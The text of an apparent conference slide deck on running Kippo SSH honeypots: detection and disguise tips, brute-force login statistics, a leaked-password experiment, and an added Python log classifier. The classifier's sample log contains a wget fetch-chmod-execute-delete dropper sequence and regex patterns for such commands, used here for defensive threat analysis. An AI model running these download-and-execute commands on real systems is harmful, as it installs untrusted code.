Honey Potz
Ethan Dodge (chp1n)
Disclaimer
The views expressed herein are solely my views and not the views of my employer, or any other organization with which I am associated. I am responsible for the content of this presentation.
Likewise, the research conducted and illustrated herein was performed by me unless otherwise noted.
Audience
• Noobs. Don't be afraid to ask questions!
• Those looking to get into the honey pot/threat intelligence communities.
• Those that already have experience honey potting.
Honey Potz
BEWARE OF ADDICTION
Why Honey Pots?
Threat Intel?
Types of Honey Pots
JUST A MORSEL OF HUNNY
HoneyDrive (Bruteforce.gr)
Honeypots included: Kippo, Dionaea, Honeyd, Glastopf, Conpot, Thug
Visualization and analysis included: Kippo-Graph, Honeyd-Viz, DionaeaFR, ELK Stack
Low Interaction vs. High Interaction

High interaction:
• Actual machine
• Complete functionality
• Can exploit whatever is exploitable
• Used to observe targeted attacks
• Not easily detectable
• Example: Bifrozt

Low interaction:
• Simulation
• Incomplete functionality
• Cannot be used to exploit other vulnerabilities
• Used to observe behavior
• Often easily detectable
• Example: Kippo
Kippo
THE GOOD AND THE BAD
“Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.”
https://github.com/desaster/kippo
How Kippo Works
How To Detect Kippo
Simple Ways To “Hide” It
• Change the hostname
• Add a login banner
• Edit userdb.txt
• Change the file system
• Edit /etc/passwd & /etc/shadow
• Edit script output
Findings
Login Attempts vs Successes in the past 30 days - LA
Total attempts: 519; total successes: 10
Total attempts: 3,924; total successes: 2
Creds
• Default root/123456 (Top Graph)
• Leaked 14 character password (Bottom Graph)
“Leaking” Creds
• Leaked a 14 character honeypot password on Pastebin
• Posted at 1:14 AM MST
• Any guesses as to how long it took until someone logged in?
2 Hours 35 Minutes
• First login with the correct password seen at 3:49 MST
• Romanian IP address
• Malicious intent
• Pastebin had over 100 views in 2 minutes (bots)
• Saw 5 logins from 3 distinct IP addresses in 12 hours
Login Attempts vs Successes in the past 30 days - Canada
Total attempts: 255,059; total successes: 79
Total attempts: 282,263; total successes: 0
Hosting Problems
You get what you pay for. (Cloud At Cost)
Changed userdb.txt
• Rejects the 100 most common passwords for the 10 most common usernames (Top Graph)
• Therefore accepts multiple passwords
• Accepts a 7 character password from 5 different usernames
• Yet to be cracked
• Leaked in a keylogger dump this morning at 7:53 MST
Changed fs.pickle
• Spun up an Ubuntu box serving DNS
• Used createfs.py to create a new fs.pickle
• Yet to see better results
• I will blog about it
Login Attempts vs Successes in the past 30 days - Europe
Total attempts: 429,661; total successes: 0
Most attacked box
• In the heart of the EU
• Doesn't get attacked as much as Asian honeypots
• 8 character password
• Logon banner in Spanish
Typical malicious session
• Wget/curl some script or executable
• Chmod it
• Execute it
• Delete it
• 99% of the time it's scripted
Occasionally you'll get a lot more commands.
Typical Detection
• Runs ps -a, ifconfig, or cats a standard file
• Sees default Kippo content
• Hops out
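As an added example (not from the talk and not Kippo's own code), the following script counts login attempts against successes the way the Findings slides do, and labels each session either as the scripted wget/chmod/execute/delete pattern or as a short probe that looks at default content and hops out. The JSON log shape, field names, sample records and regex heuristics are all assumptions constructed for this example; the micheloosterhof fork's real JSON schema may differ.

```python
import json
import re
from collections import defaultdict
# Constructed JSON-per-line records standing in for a Kippo fork's JSON log.
# The field names are an assumption made for this example, not any fork's schema.
SAMPLE_LOG = """\
{"session": "s1", "src_ip": "203.0.113.7", "event": "login.failed", "username": "root", "password": "123456"}
{"session": "s1", "src_ip": "203.0.113.7", "event": "login.success", "username": "root", "password": "Vq7kLm3zP9wRtB"}
{"session": "s1", "src_ip": "203.0.113.7", "event": "command", "input": "wget http://198.51.100.9/x.sh -O /tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.7", "event": "command", "input": "chmod +x /tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.7", "event": "command", "input": "/tmp/x.sh"}
{"session": "s1", "src_ip": "203.0.113.7", "event": "command", "input": "rm -f /tmp/x.sh"}
{"session": "s2", "src_ip": "198.51.100.23", "event": "login.failed", "username": "admin", "password": "admin"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "login.success", "username": "root", "password": "Vq7kLm3zP9wRtB"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "command", "input": "ps -a"}
{"session": "s3", "src_ip": "192.0.2.44", "event": "command", "input": "cat /etc/passwd"}
"""
def parse_log(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def login_stats(records):
    # "Total attempts" vs "Total successes", as reported on the Findings slides.
    attempts = sum(1 for r in records if r["event"].startswith("login."))
    successes = sum(1 for r in records if r["event"] == "login.success")
    return attempts, successes
# Ordered stages of the scripted fetch -> chmod -> execute -> delete session.
STAGES = [re.compile(p) for p in (
    r"^(wget|curl)\b", r"^chmod\b", r"^(\./|/tmp/|sh\b|bash\b)", r"^rm\b")]
# Commands a visitor typically runs to check for default Kippo content.
PROBE = re.compile(r"^(ps\b|ifconfig\b|cat\s+/(etc|proc)/)")

def classify_session(commands):
    stage = 0
    for cmd in commands:  # advance only when the next expected stage appears
        if stage < len(STAGES) and STAGES[stage].match(cmd):
            stage += 1
    if stage == len(STAGES):
        return "scripted-dropper"
    probes = sum(1 for c in commands if PROBE.match(c))
    if probes and len(commands) <= 4:  # a few probes, then hops out
        return "honeypot-probe"
    return "interactive" if commands else "login-only"

def sessions_by_label(records):
    cmds = defaultdict(list)
    for r in (r for r in records if r["event"] == "command"):
        cmds[r["session"]].append(r["input"])
    return {sid: classify_session(cmds[sid]) for sid in {r["session"] for r in records}}
```

Sessions labelled "honeypot-probe" are the ones worth reviewing when tuning the hostname, banner and file-system changes from the "Simple Ways To Hide It" slide, since they show which default content gave the box away.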
Kippo Visualization
THE OLD AND THE NEW
Kippo-Graph
Tango Honeypot Intelligence
@Brian_Warehime
Demo Time
Downloads
• Original Kippo: https://github.com/desaster/kippo
• Kippo fork I use: https://github.com/micheloosterhof/kippo
  • Supports SFTP and JSON logging
  • Is updated regularly
• Download Tango: https://apps.splunk.com/app/2666/
• Download HoneyDrive: http://sourceforge.net/projects/honeydrive/
Hosting Links
• Crissic (crissic.net, $10/year): LA and Florida
• Cloud At Cost (cloudatcost.com, $35/life): Canada
• Time4VPS (Time4VPS, €10/year): European Union
• Lowendstock.com
• Lowendtalk.com
@Andrew__Morris
@Brian_Warehime
@micheloosterhof
@da_667
@Threat_Inc
Contact
Freenode: chp1n
Twitter: @chp1n
Blog: utzpin.org
The end.